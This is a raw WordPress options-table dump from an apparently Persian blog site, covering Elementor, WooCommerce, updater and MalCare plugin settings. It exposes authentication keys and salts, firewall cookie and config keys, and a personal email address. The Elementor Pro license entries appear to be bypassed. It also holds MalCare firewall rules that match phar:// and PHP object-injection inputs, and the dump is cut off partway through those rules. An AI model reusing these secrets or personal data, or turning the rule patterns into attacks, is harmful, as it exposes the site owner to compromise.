}s:8:\"advanced\";a:3:{s:14:\"_section_style\";a:2:{s:14:\"_margin_tablet\";i:1;s:14:\"_margin_mobile\";i:1;}s:17:\"_section_position\";a:3:{s:14:\"_element_width\";i:3;s:21:\"_element_width_tablet\";i:1;s:21:\"_element_width_mobile\";i:3;}s:34:\"aux_core_common_custom_css_section\";a:1:{s:10:\"custom_css\";i:3;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:5:{s:3:\"gap\";i:5;s:16:\"content_position\";i:4;s:15:\"stretch_section\";i:1;s:13:\"content_width\";i:1;s:6:\"layout\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:5;s:16:\"background_color\";i:3;}s:14:\"section_border\";a:2:{s:26:\"box_shadow_box_shadow_type\";i:1;s:21:\"box_shadow_box_shadow\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:3:{s:7:\"padding\";i:4;s:6:\"margin\";i:2;s:13:\"margin_tablet\";i:1;}s:34:\"aux_core_common_custom_css_section\";a:1:{s:10:\"custom_css\";i:1;}}}}s:8:\"aux_logo\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:7:\"general\";a:2:{s:5:\"align\";i:1;s:12:\"align_mobile\";i:1;}}s:8:\"advanced\";a:2:{s:17:\"_section_position\";a:2:{s:21:\"_element_width_mobile\";i:1;s:14:\"_element_width\";i:2;}s:22:\"aux_core_general_extra\";a:1:{s:20:\"aux_max_width_mobile\";i:1;}}}}s:14:\"aux_search_box\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:12:\"icon_section\";a:3:{s:9:\"icon_size\";i:1;s:10:\"icon_color\";i:1;s:11:\"icon_margin\";i:1;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}s:17:\"_section_position\";a:1:{s:14:\"_element_width\";i:1;}}}}s:12:\"social-icons\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:19:\"section_social_icon\";a:2:{s:16:\"social_icon_list\";i:1;s:5:\"shape\";i:1;}}s:5:\"style\";a:1:{s:20:\"section_social_style\";a:6:{s:10:\"icon_color\";i:1;s:18:\"icon_primary_color\";i:1;s:20:\"icon_secondary_color\";i:1;s:9:\"icon_size\";i:1;s:12:\"icon_padding\";i:1;s:12:\"icon_spacing\";i:1;}}s:8:\"advanced\";a:1:{s:17:\"_section_position\";a:1:{s:14:\"_element_width\";i:1;}}}}}s:6:\"footer\";a:3:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}s:7:\"wp-page\";a:4:{s:5:\"image\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_image\";a:6:{s:5:\"image\";i:4;s:10:\"image_size\";i:4;s:5:\"align\";i:3;s:7:\"caption\";i:1;s:7:\"link_to\";i:4;s:4:\"link\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:5:{s:19:\"image_border_border\";i:3;s:18:\"image_border_width\";i:3;s:19:\"image_border_radius\";i:3;s:32:\"image_box_shadow_box_shadow_type\";i:3;s:27:\"image_box_shadow_box_shadow\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"_section_masking\";a:1:{s:11:\"_mask_shape\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:6;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:6;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:21:\"background_background\";i:3;s:19:\"background_position\";i:3;s:21:\"background_attachment\";i:3;s:15:\"background_size\";i:3;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}}}s:21:\"wp-widget-media_video\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:0:{}}}}','no'),
(156605,'wp_calendar_block_has_published_posts','1','yes'),
(162081,'woocommerce_task_list_hidden_lists','a:0:{}','yes'),
(162120,'woocommerce_task_list_completed_lists','a:1:{i:0;s:8:\"extended\";}','yes'),
(162121,'woocommerce_task_list_prompt_shown','1','yes'),
(162147,'woocommerce_refund_returns_page_id','606','yes'),
(169625,'bbb_admin_panel_widget_title','تست','yes'),
(169669,'woocommerce_analytics_enabled','yes','yes'),
(190085,'elementor_events_db_version','1.0.0','no'),
(190100,'woocommerce_attribute_lookup_direct_updates','no','yes'),
(190105,'woocommerce_admin_version','3.3.2','yes'),
(262692,'woocommerce_task_list_reminder_bar_hidden','yes','yes'),
(262731,'user_count','1','off'),
(268494,'fs_options','a:1:{s:14:\"api_clock_diff\";i:791;}','yes'),
(313549,'woocommerce_downloads_deliver_inline','','no'),
(313550,'woocommerce_navigation_enabled','no','yes'),
(313551,'woocommerce_feature_custom_order_tables_enabled','no','yes'),
(313572,'_transient_wc_attribute_taxonomies','a:0:{}','yes'),
(313573,'woocommerce_attribute_lookup_enabled','yes','yes'),
(318578,'_transient_wc_count_comments','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:0;s:3:\"all\";i:0;s:5:\"trash\";s:1:\"4\";s:9:\"moderated\";i:0;s:8:\"approved\";i:0;s:4:\"spam\";i:0;s:12:\"post-trashed\";i:0;}','yes'),
(318602,'dismissed-drgf-welcome','1','yes'),
(318793,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),
(318794,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),
(318795,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),
(318806,'elementor_pro_version','3.29.2','yes'),
(318807,'widget_elementor-library','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(318808,'_elementor_pro_installed_time','1670069971','yes'),
(318809,'elementor_submissions_db_version','5','yes'),
(318810,'elementor_fonts_manager_font_types','a:0:{}','yes'),
(318811,'elementor_fonts_manager_fonts','a:0:{}','yes'),
(318812,'elementor_custom_icon_sets_config','a:0:{}','yes'),
(318819,'elementor_pro_license_key','activated','yes'),
(318820,'_transient_elementor_pro_license_data','a:2:{s:7:\"license\";s:5:\"valid\";s:7:\"expires\";s:10:\"01.01.2030\";}','yes'),
(318822,'_transient_timeout_elementor_pro_license_data','1893456000','yes'),
(337976,'_elementor_pro_api_requests_lock','a:2:{s:11:\"get_version\";i:1770709416;s:16:\"get_license_data\";i:1716073615;}','yes'),
(337990,'elementor_pro_tracker_notice','1','yes'),
(337991,'elementor_tracker_notice','1','yes'),
(348472,'83104b6039d6d3853445d70f67fdfdb4','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675773126,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348684,'93fe1df944f804a59e4b2a18c58ae105','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675795064,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348696,'0151bb15eae77ad8d8a7e9c99d5a88f8','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675795612,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348697,'8613ee8a9e5ccd81c8cfd4d3d9558943','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675795705,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348698,'37f0d9a138b681c224bbbc5f4f51f598','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675795975,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348699,'871c4dd7797d598be0961d6ccee05c86','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796077,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348707,'b843087d833d236d0b9ce203b3ae1b5c','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796170,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348708,'b9f9122d4ce9a2c98e9745d19c9f499b','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796236,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348709,'f6031e5717daa259786adfb9069528cd','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796239,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348710,'783587afc7b4d60529e0b3cb001d943e','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796292,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348711,'3e1b945db2e9869f0f62f2560d64524e','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796294,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348712,'19b2f70973818dbc1f7433a6ce692a49','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796368,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348713,'ecbc417f2bfce16221dbf1c3775d1b70','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796412,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348714,'c0a3930e19d300283d548a1bd5eb3759','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675796414,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(348719,'ce31c47a2d09ba44b2f4606ecbeb6522','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675797263,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(349427,'fd79faaa243749c068fcc1c65f453926','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":0,\"timer\":1675945914,\"message\":\"\\u062f\\u0627\\u0645\\u0646\\u0647 \\u0627\\u0631\\u0633\\u0627\\u0644 \\u0634\\u062f\\u0647 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0646\\u0645\\u06cc\\u200c\\u0628\\u0627\\u0634\\u062f.\"}','yes'),
(349519,'_elementor_pro_license_v2_data_fallback','a:2:{s:7:\"timeout\";i:1716160015;s:5:\"value\";s:233:\"{\"expires\":\"25-05-18 23:06:55\",\"subscription_id\":1.1111111111111112e+31,\"status\":\"ACTIVE\",\"recurring\":true,\"features\":[\"template_access_level_20\",\"kit_access_level_20\",\"editor_comments\"],\"activated\":true,\"cached\":true,\"success\":true}\";}','no'),
(349520,'_elementor_pro_license_v2_data','a:2:{s:7:\"timeout\";i:1779054673;s:5:\"value\";s:71:\"{\"success\":true,\"license\":\"valid\",\"expires\":\"01.01.2030\",\"features\":[]}\";}','no'),
(364645,'secure_auth_key','&P^f|Jq ~@nqeM]f*7$,FI+IzK?Qr.5]Yp0IHZ-Vd,S-@M_^P=MA2dk,r.mC5Dy^','no'),
(364646,'secure_auth_salt','n8USa]U/*aL%(w4d^shtD0wC~.#fcUG7DUVwZ61gpeVpr!0Ta<?(K?>+`cF-iu?W','no'),
(391406,'45024a0a0020e0c44abfb6df7a66ccc1','{\"starter\":\"NzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0\",\"action\":1,\"message\":\"\\u0644\\u0627\\u06cc\\u0633\\u0646\\u0633 \\u0645\\u0639\\u062a\\u0628\\u0631 \\u0645\\u06cc\\u0628\\u0627\\u0634\\u062f.\",\"timer\":1680096881}','yes'),
(391672,'_transient_auxin_update_plugins','O:8:\"stdClass\":2:{s:12:\"last_checked\";i:1681756900;s:7:\"checked\";a:1:{s:33:\"auxin-elements/auxin-elements.php\";s:6:\"2.11.2\";}}','yes'),
(391673,'_transient_auxin_update_themes','O:8:\"stdClass\":1:{s:12:\"last_checked\";i:1681756898;}','yes'),
(391677,'elementor_google_maps_api_key','','yes'),
(391678,'elementor_google_font','1','yes'),
(391679,'elementor_meta_generator_tag','','yes'),
(391680,'elementor_experiment-e_font_icon_svg','active','yes'),
(391681,'elementor_experiment-container','active','yes'),
(391682,'elementor_experiment-editor_v2','active','yes'),
(391683,'elementor_experiment-nested-elements','active','yes'),
(391686,'elementor_experiment-additional_custom_breakpoints','active','yes'),
(391687,'elementor_experiment-e_swiper_latest','active','yes'),
(391693,'elementor_enable_inspector','enable','yes'),
(395530,'_elementor_editor_upgrade_notice_dismissed','1758264502','yes'),
(395541,'hello_theme_version','3.4.4','yes'),
(395655,'elementor_experiment-kit-elements-defaults','active','yes'),
(395656,'elementor_experiment-e_hidden_wordpress_widgets','active','yes'),
(395657,'elementor_experiment-hello-theme-header-footer','active','yes'),
(395723,'ZhUpClient_options','a:11:{s:11:\"all-plugins\";s:1:\"1\";s:10:\"all-themes\";s:1:\"1\";s:17:\"remove-old-backup\";s:1:\"1\";s:17:\"backup-keep-count\";s:1:\"2\";s:18:\"send-notifications\";s:1:\"1\";s:13:\"email-address\";s:25:\"masoud.nikoofar@gmail.com\";s:16:\"send-email-delay\";s:1:\"2\";s:24:\"send-admin-notifications\";s:1:\"1\";s:24:\"show-admin-notifications\";s:1:\"1\";s:21:\"check-spacial-plugins\";a:12:{s:59:\"disable-remove-google-fonts/disable-remove-google-fonts.php\";s:1:\"1\";s:23:\"elementor/elementor.php\";s:1:\"1\";s:31:\"elementor-pro/elementor-pro.php\";s:1:\"1\";s:39:\"syntaxhighlighter/syntaxhighlighter.php\";s:1:\"1\";s:23:\"wordfence/wordfence.php\";s:1:\"1\";s:31:\"wp-statistics/wp-statistics.php\";s:1:\"1\";s:33:\"zhaket-updater/zhaket-updater.php\";s:1:\"1\";s:32:\"duplicate-page/duplicatepage.php\";s:1:\"1\";s:19:\"tugoluq/tugoluq.php\";s:1:\"1\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:1:\"1\";s:28:\"malcare-security/malcare.php\";s:1:\"1\";s:24:\"wordpress-seo/wp-seo.php\";s:1:\"1\";}s:20:\"check-spacial-themes\";a:3:{s:15:\"hello-elementor\";s:1:\"1\";s:15:\"twentytwentytwo\";s:1:\"1\";s:16:\"twentytwentyfour\";s:1:\"1\";}}','yes'),
(395724,'zhupclient_correct_install','1','yes'),
(395725,'befcb875400efe619e38d54958e','YTo1OntzOjMyOiJkYjI0NGM0ZWM2ZjQyMmVkNjBhYjQ1NjU1Njg1ZWI0ZCI7czozNjoiNzQ5MmZiOTMtMTExMi00YTk1LTk0ZjQtOWVlODBjZTQ5YjI0IjtzOjMwOiJhZWZhNWRhZWQ2N2RlYTJmZmI2ZjViZGNiNGJhM2UiO3M6Mzc6ItmE2KfbjNiz2YbYsyDZhdi52KrYqNixINmF24zYqNin2LTYry4iO3M6MzA6ImM1MTAxNDQyYzNlNmQ5ZjkyYjk2M2JkNzA3NTdiYyI7aToxNzIwNDU0NzI4O3M6MzE6ImJlNzY3NTQ1OTE1YzNiZDE0ZTc4ZjhkY2Y4MTM5OGYiO2I6MDtzOjI2OiJiOTNhODdjODk3ZTNmNjBjMmIyZTE4ZTY2ZiI7YjoxO30=','yes'),
(395729,'elementor_notes_db_version','5','yes'),
(397801,'elementor_pro_theme_builder_conditions','a:3:{s:6:\"header\";a:1:{i:715;a:1:{i:0;s:15:\"include/general\";}}s:6:\"single\";a:1:{i:681;a:1:{i:0;s:21:\"include/singular/post\";}}s:6:\"footer\";a:1:{i:358;a:1:{i:0;s:15:\"include/general\";}}}','yes'),
(397855,'site_logo','786','yes'),
(397861,'zhupclient_plugins','a:3:{s:31:\"elementor-pro/elementor-pro.php\";a:3:{s:2:\"id\";s:24:\"5dcab96eeaec3701a2775d45\";s:3:\"ver\";s:6:\"3.14.1\";s:3:\"url\";s:0:\"\";}s:33:\"zhaket-updater/zhaket-updater.php\";a:3:{s:2:\"id\";s:24:\"5dda7adab6cb3600856be699\";s:3:\"ver\";s:5:\"3.0.1\";s:3:\"url\";s:50:\"https://ircdn.zhaket.com/public/zhaket-updater.zip\";}s:23:\"wordfence/wordfence.php\";a:3:{s:2:\"id\";s:24:\"5dcab542eaec3701a2775654\";s:3:\"ver\";s:6:\"7.10.0\";s:3:\"url\";s:0:\"\";}}','yes'),
(397862,'zhupclient_themes','a:0:{}','yes'),
(397863,'zhupclient_ver','21603','yes'),
(398065,'auto_update_plugins','a:13:{i:0;s:59:\"disable-remove-google-fonts/disable-remove-google-fonts.php\";i:1;s:23:\"elementor/elementor.php\";i:2;s:39:\"syntaxhighlighter/syntaxhighlighter.php\";i:3;s:23:\"wordfence/wordfence.php\";i:4;s:31:\"elementor-pro/elementor-pro.php\";i:5;s:32:\"duplicate-page/duplicatepage.php\";i:6;s:24:\"wordpress-seo/wp-seo.php\";i:7;s:40:\"wordpress-seo-premium/wp-seo-premium.php\";i:8;s:25:\"wpseo-video/video-seo.php\";i:9;s:25:\"wpseo-local/local-seo.php\";i:10;s:39:\"wpseo-woocommerce/wpseo-woocommerce.php\";i:11;s:25:\"wpseo-news/wpseo-news.php\";i:12;s:57:\"acf-content-analysis-for-yoast-seo/yoast-acf-analysis.php\";}','no'),
(399981,'duplicate_page_options','a:4:{s:21:\"duplicate_post_status\";s:5:\"draft\";s:23:\"duplicate_post_redirect\";s:7:\"to_list\";s:21:\"duplicate_post_suffix\";s:0:\"\";s:21:\"duplicate_post_editor\";s:7:\"classic\";}','yes'),
(401786,'zhupclient_validate_domain','s:137:\"a:3:{s:7:\"timeout\";i:1693170000;s:3:\"key\";s:60:\"7cd2f984844b6457e1cdcc9055657b1037cd13349f145fef44fe1214a4ae\";s:6:\"c_time\";i:1693168803;}\";','no'),
(401787,'zhupclient_validate_result','1','no'),
(414404,'simba_tfa_priv_key_format','1','no'),
(414554,'mcbrand','a:12:{s:4:\"name\";s:7:\"MalCare\";s:5:\"title\";s:7:\"MalCare\";s:11:\"description\";s:43:\"Complete protection for your WordPress site\";s:9:\"pluginuri\";s:23:\"https://www.malcare.com\";s:6:\"author\";s:7:\"MalCare\";s:10:\"authorname\";s:7:\"MalCare\";s:9:\"authoruri\";s:23:\"https://www.malcare.com\";s:8:\"menuname\";s:7:\"MalCare\";s:4:\"logo\";s:17:\"../img/mclogo.png\";s:7:\"webpage\";s:19:\"https://malcare.com\";s:6:\"appurl\";s:23:\"https://app.malcare.com\";s:19:\"hide_plugin_details\";b:1;}','no'),
(414558,'mcconfig','a:7:{s:8:\"services\";a:2:{i:0;s:12:\"activity_log\";i:1;s:7:\"protect\";}s:12:\"activity_log\";a:2:{s:14:\"ignored_events\";a:2:{s:10:\"post_types\";a:1:{i:0;s:13:\"wppf_property\";}s:16:\"post_types_regex\";a:0:{}}s:9:\"ip_header\";a:2:{s:3:\"hdr\";s:11:\"REMOTE_ADDR\";s:3:\"pos\";i:0;}}s:7:\"protect\";a:6:{s:15:\"mc_conf_version\";s:1:\"2\";s:8:\"ipheader\";a:2:{s:3:\"hdr\";s:11:\"REMOTE_ADDR\";s:3:\"pos\";i:0;}s:9:\"brandname\";s:7:\"MalCare\";s:7:\"confkey\";s:32:\"90a5a0545238245a27c1642ffabf48a6\";s:2:\"fw\";a:14:{s:4:\"mode\";i:3;s:16:\"reqprofilingmode\";i:2;s:11:\"bypasslevel\";i:2;s:10:\"cookiemode\";i:2;s:11:\"loggingmode\";i:1;s:15:\"admincookiemode\";i:1;s:12:\"ipcookiemode\";i:2;s:11:\"customroles\";a:0:{}s:9:\"cookiekey\";s:32:\"d567925aae4959d9ad9ec985cbec6c82\";s:10:\"cookiepath\";s:0:\"\";s:12:\"cookiedomain\";s:0:\"\";s:9:\"rulesmode\";i:3;s:27:\"cansetcachepreventioncookie\";b:0;s:13:\"isgeoblocking\";b:0;}s:2:\"lp\";a:8:{s:6:\"ptplug\";s:7:\"malcare\";s:4:\"mode\";i:3;s:12:\"captchalimit\";i:10;s:14:\"tempblocklimit\";i:15;s:13:\"blockalllimit\";i:100;s:14:\"failedlogingap\";i:1800;s:15:\"successlogingap\";i:3600;s:13:\"allblockedgap\";i:1800;}}s:10:\"db_version\";s:1:\"4\";s:7:\"abspath\";s:27:\"/var/www/html/ictbank/blog/\";s:7:\"siteurl\";s:23:\"https://ictbank.ir/blog\";s:14:\"siteurl_scheme\";s:5:\"https\";}','no'),
(414559,'bvruleset','a:22:{i:0;a:5:{s:2:\"id\";i:1;s:5:\"level\";N;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:12:\"/phar:\\/\\//i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:12:\"/phar:\\/\\//i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:1;a:5:{s:2:\"id\";i:2;s:5:\"level\";N;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"greaterThan\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:0;}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:10:\"matchCount\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:36:\"/(^|;|{|})O:+?\\+*[0-9]+:\"WP_Theme\"/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"greaterThan\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:0;}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:10:\"matchCount\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:36:\"/(^|;|{|})O:+?\\+*[0-9]+:\"WP_Theme\"/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:2;a:5:{s:2:\"id\";i:4;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:43:\"/(^|\\/|\\\\